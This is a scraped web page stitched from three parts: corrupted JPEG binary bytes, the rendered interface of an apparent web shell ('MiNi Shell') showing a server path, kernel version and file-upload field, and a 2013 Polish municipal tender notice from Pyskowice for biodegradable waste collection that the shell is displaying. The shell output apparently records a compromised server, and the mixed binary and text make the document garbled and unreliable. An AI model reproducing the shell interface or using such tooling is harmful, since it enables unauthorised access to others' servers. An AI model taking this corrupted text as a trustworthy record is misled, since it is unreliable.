JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130412/55589-N-2013.html

<p class="kh_header"><b>Pyskowice: SELEKTYWNA  ZBIÓRKA  ODPADÓW  BIODEGRADOWALNYCH</b><br>
<b>Numer ogłoszenia: 55589 - 2013; data zamieszczenia: 12.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SELEKTYWNA  ZBIÓRKA  ODPADÓW  BIODEGRADOWALNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis  przedmiotu  zamówienia:
1.Poinformowanie  o  harmonogramie  odbioru  odpadów  biodegradowalnych  w  2013r.   mieszkańców  oraz  miejskich  jednostek  organizacyjnych  Gminy,  poprzez  dystrybucję  w punkcie  odbioru i podczas odbioru odpadów zgodnie z harmonogramem,  ulotek  dostarczonych  przez  Zamawiającego.  
2.Przechowywanie  i  dystrybucja  pojemników  przeznaczonych  do  selektywnej  zbiórki  odpadów  biodegradowalnych  będących  własnością  Zamawiającego.  Wykonawca  zobowiązany  jest  do  wydania  i  dostarczenia  pojemników  pod  adres  wskazany  przez  Zamawiającego.  Czas  reakcji  3  dni  od  daty  zlecenia. Szacunkowa  ilość  przechowywanych  pojemników - 50  sztuk w okresie realizacji umowy.

W  I  półroczu  2013  roku:
1.Odbiór  wg  harmonogramu  (zał.  nr  6  do  SIWZ)  odpadów  biodegradowalnych  z  651  sztuk  pojemników  o  pojemności  240L  od  mieszkańców  z  zabudowy  jednorodzinnej  oraz  z  21  sztuk  pojemników  o  pojemności  240L  z miejskich jednostek  organizacyjnych  Gminy  Pyskowice.  Liczba  pojemników,  o  których  mowa  w  pkt.  2  jw.  Opis  przedmiotu  zamówienia może  ulec  zwiększeniu, jednak  nie  więcej  niż  o 50  sztuk  pojemników.


1.Dystrybucja  worków  o  pojemności  120L  przeznaczonych  do  gromadzenia  odpadów  biodegradowalnych  wśród  zainteresowanych  mieszkańców  oraz miejskich jednostek  organizacyjnych     Gminy.
2.Odbiór  od  zainteresowanych  mieszkańców  w  miejscu  ich  zamieszkania,  odpadów  biodegradowalnych  zgromadzonych  w  workach  o  pojemności  120L,  w  terminach  wskazanych  w  harmonogramie  oraz  w  oznaczonym  miejscu  na  terenie  Gminy  Pyskowice  tzw.  punkt  odbioru  od  poniedziałku  do  piątku  w  godzinach  od  7.00  do  15.00,  do którego  mieszkańcy  będą  mogli  sami  dostarczyć  worki  ze  zbieranymi  selektywnie  odpadami  biodegradowalnymi.

W  II  półroczu  2013  roku:
1.Odbiór  wg  harmonogramu  (zał.  nr  6  do  SIWZ)  odpadów  biodegradowalnych  z  21  sztuk  pojemników  o  pojemności  240L  z  miejskich  jednostek  organizacyjnych   Gminy  Pyskowice.  
2.Dystrybucja  worków  o  pojemności  120L  przeznaczonych  do  gromadzenia  odpadów  biodegradowalnych  wśród    miejskich  jednostek  organizacyjnych  Gminy, w terminach wskazanych w harmonogramie podczas odbioru wypełnionych  worków.

Biorąc  pod  uwagę  powyższe  Zamawiający  wskazuje, że   minimalny  zakres  zamówienia wynosi:
wywóz  odpadów  biodegradowalnych  z  pojemnika  o  pojemności  240L - jednostka  obmiaru  1  pojemnik - 1953  sztuk,
odbiór  odpadów  biodegradowalnych  zebranych  w  workach  o  pojemności  120L - jednostka  obmiaru  1  worek  - 227  sztuk.

UWAGA:
Zamawiający  informuje,  iż  przy  realizacji  przedmiotu  zamówienia  stosuje  prawo  opcji,  co  oznacza,  że  wielkości  podane  w  formularzu  cenowym - załącznik  nr  2  do  SIWZ  kolumna  nr  4  oraz  w/w  zakres - są  wielkościami  minimalnymi,  które  należy  wycenić  w  ofercie  cenowej.  W  przypadku  gdy  zakres  prac  będzie  większy  niż  określony  w  formularzu  cenowym  Zamawiającemu  przysługuje  prawo  opcji  do  zwiększenia  przedmiotu  zamówienia  do  maksymalnych  wartości  określonych  poniżej  tj.:
wywóz  odpadów  biodegradowalnych  z  pojemnika  o  pojemności  240L - jednostka  obmiaru  1  pojemnik - 2804  sztuk,
odbiór  odpadów  biodegradowalnych  zebranych  w  workach  o  pojemności  120L - jednostka  obmiaru  1  worek - 1778  sztuk.
Zamawiający  w  przypadku  dysponowania  dodatkowymi  środkami  finansowymi  przewiduje  udzielenie  zamówienia  uzupełniającego  określonego  w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  Zamówień  Publicznych  do  50%  zamówienia  podstawowego.
Wyliczona  w  formularzu  cenowym  (wiersz  nr  3)  wartość  umowy  posłuży  Zamawiającemu  do  wyłonienia  oferty  najkorzystniejszej.
Wynagrodzenie  będzie  wypłacane  za  faktyczne  wykonanie  poszczególnych  usług  wchodzących  w  zakres  przedmiotu  umowy,  wyliczone  na  podstawie  cen  jednostkowych  brutto  wynikających  z  oferty  Wykonawcy  oraz  ilości faktycznie  wykonanych  prac.

Szczegółowy opis zamówienia zawiera SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  w  przypadku  dysponowania  dodatkowymi  środkami  finansowymi  przewiduje  udzielenie  zamówienia  uzupełniającego  określonego  w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  Zamówień  Publicznych  do  50%  zamówienia  podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi  posiadać  uprawnienia  do  wykonywania  działalności  polegającej  na  odbieraniu  odpadów  komunalnych  od  właścicieli  nieruchomości  zgodnie  z  przepisami  ustawy  o  utrzymaniu  czystości  i  porządku  w  gminach  z  dnia  13.09.1996r.  (t. j.  Dz.  U.  z  2012r.  poz.  391  ze  zm.),  gospodarowaniu  odpadami  komunalnymi  zgodnie  z  przepisami  ustawy  z  dnia  27.04.2011r.  o  odpadach  (t. j.  z  2010r.  Dz.  U.  Nr  185,  poz.  1234  ze  zm.)  oraz  ustawy  z  dnia  14.12.2012r.  o  odpadach  (Dz.  U.  z  2013r.,  poz.  21),  

Ocena spełniania warunku dokonana zostanie w systemie 0-1 ( zero jedynkowym)
zgodnie z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane  jest  wykazanie  przez  Wykonawcę,  że  w  okresie  ostatnich  3  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie  wykonał  przynajmniej  2  usługi,  a w  przypadku  świadczeń  okresowych  lub  ciągłych  wykonuje dwie  usługi  polegające  na  odbiorze  odpadów  biodegradowalnych,  o  wartości  nie  mniejszej  niż  50.000,00 zł brutto każda,  w  okresie  nie  dłuższym  niż  12  miesięcy.
Zamawiający  w  przypadku,  gdy  przedmiotem  zamówienia  są  świadczenia  okresowe  lub  ciągłe  dopuszcza  nie  tylko  zamówienia  wykonane  (tj.  zakończone),  ale  również  wykonywane.  W  takim  przypadku  część  zamówienia  już  faktycznie  wykonana  musi  wypełniać  wymogi  określone  przez  Zamawiającego  w  warunku  jw.

Ocena spełniania warunku dokonana zostanie w systemie 0-1 ( zero jedynkowym)
zgodnie z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi  wykazać  dysponowanie  (dysponuje/będzie  dysponował)  odpowiednim  potencjałem  technicznym,  w  celu  realizacji  zamówienia  tj.  posiadać  minimum:
śmieciarki  bezpylne                                2  sztuki 
samochód  samowyładowczy  do  3,5 t  lub ciągnik  z  przyczepą  1  sztuka.

Ocena spełniania warunku dokonana zostanie w systemie 0-1 ( zero jedynkowym)
zgodnie z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku.warunku,
jedynie wymaga się złożenia oświadczenia na podstawie art. 22 ust.1 ustawy Pzp. Ocena spełniania
warunku dokonana zostanie w systemie 0-1 ( zero jedynkowym) zgodnie z formułą spełnia/ nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku.warunku,
jedynie wymaga się złożenia oświadczenia na podstawie art. 22 ust.1 ustawy Pzp. Ocena spełniania
warunku dokonana zostanie w systemie 0-1 ( zero jedynkowym) zgodnie z formułą spełnia/ nie
spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Pod  pojęciem  głównych  usług  Zamawiający  rozumie  usługi  polegające  na  odbiorze  odpadów  biodegradowalnych,  w  zakresie  i  ilości  niezbędnej  do  wskazania  spełnienia  warunek  wiedzy  i  doświadczenia  tj.  o  wartości  nie  mniejszej  niż  50.000,00  zł  brutto każda,  w  okresie  nie  dłuższym  niż  12  miesięcy.

W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, potwierdzających czy usługi zostały wykonane lub są wykonywane należycie.



Dowodami  są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa.

Zgodnie z § 9 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4. Inne  oświadczenia  i  dokumenty,  które  należy  przedłożyć  wraz  z  ofertą.

4. 1. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.

4.  2. Dokumenty  sporządzone  w  języku  obcym  muszą  być  złożone  wraz  z  tłumaczeniami  na  język  polski.

4.  3. Dokumenty przedłożone w formie kopii winny być potwierdzone wraz z pieczątką imienną za zgodność z oryginałem przez uprawnionego przedstawiciela wykonawcy. Uprawnienie do podpisywania powinno być dołączone, o ile nie wynika to z innych  dokumentów.

4.  4.  Oświadczenia,  że  Wykonawcy:
4.  4.  1.   zapoznali  się  z  treścią  SIWZ  oraz  wszystkimi  załącznikami  stanowiącymi  jej  integralną  część  i  nie  wnoszą  do  nich  zastrzeżeń,
4.  4.  2.  w  przypadku  przyznania  im  zamówienia,  zobowiązują  się  do  zawarcia  umowy  w  miejscu  i  terminie  wskazanym  przez  Zamawiającego  na  warunkach  określonych  we  wzorze  umowy  stanowiący  załącznik  nr  7  do  SIWZ,
4.  4.  3.  uważają  się  za  związanych  niniejszą  ofertą  na  czas  wskazany  w  SIWZ  tj.  30  dni  od  daty  otwarcia  ofert,
4.  4.  4.  pod  groźbą  odpowiedzialności  karnej  oświadczają,  że  załączone  do  oferty  dokumenty  opisują  stan  prawny  i  faktyczny,  aktualny  na  dzień  otwarcia  ofert.

Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach, pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej SIWZ
W przypadku przedstawienia przez wykonawcę, w celu wykazania spełniania warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie:
- średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający  dopuszcza  możliwość  dokonania  zmian  postanowień zawartej umowy  w  stosunku  do  treści  oferty,  w  następujących   przypadkach:
a)w  przypadku  zmiany  przepisów  prawa  związane  ze  stawką  podatku  VAT,  zmiany te  zostaną  odpowiednio  uwzględnione,
b)zmiana  osoby  uprawnionej  do  realizacji  umowy  zarówno  ze  strony  Zamawiającego  jak  i  Wykonawcy  następuje  po  pisemnym  poinformowaniu  drugiej  Strony  i  nie  wymaga  aneksu  do  umowy.
2.Zmiany  umowy  wymagają  aneksu  pod  rygorem  nieważności  z  zastrzeżeniem  ust.  1  pkt. b.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach,
ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE, pok 307..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2013 godzina 10:30, miejsce: Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE w
Biurze Obsługi Interesanta pok. 107 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com